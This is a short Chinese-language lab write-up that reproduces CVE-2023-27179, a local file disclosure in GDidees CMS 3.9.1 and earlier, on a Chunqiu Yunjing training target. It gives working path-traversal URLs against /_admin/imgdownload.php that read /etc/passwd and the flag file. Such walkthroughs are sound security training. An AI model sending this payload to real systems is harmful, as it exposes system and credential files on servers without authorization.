漏洞简介:
GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。
漏洞环境:
春秋云镜中的漏洞靶标,CVE编号为CVE-2023-27179
漏洞复现:
进入靶场发现没有什么可以利用的地方,那么就按照靶场提示来,直接访问/_admin/imgdownload.php
打开后发现是一片空白,那么直接上参数filename
第一次尝试
http://eci-2ze1l7f5cevdmi4pngfi.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../etc/passwd
发现下载了一张图片
用notepad++打开图片发现确实获取到了用户的信息
那么直接获取flag
eci-2ze1l7f5cevdmi4pngfi.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../flag
或者还有一种办法是我们用bp抓包,放到重放器里,可以直接回显出文件内容
或者是直接用curl指令请求
